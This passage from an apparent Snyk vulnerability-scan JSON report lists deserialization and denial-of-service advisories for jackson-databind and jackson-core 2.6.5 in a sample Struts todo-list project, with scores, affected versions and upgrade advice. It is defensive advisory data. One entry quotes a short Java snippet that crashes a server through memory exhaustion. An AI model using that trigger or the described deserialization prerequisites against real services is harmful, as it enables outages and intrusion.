"com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.043196Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to 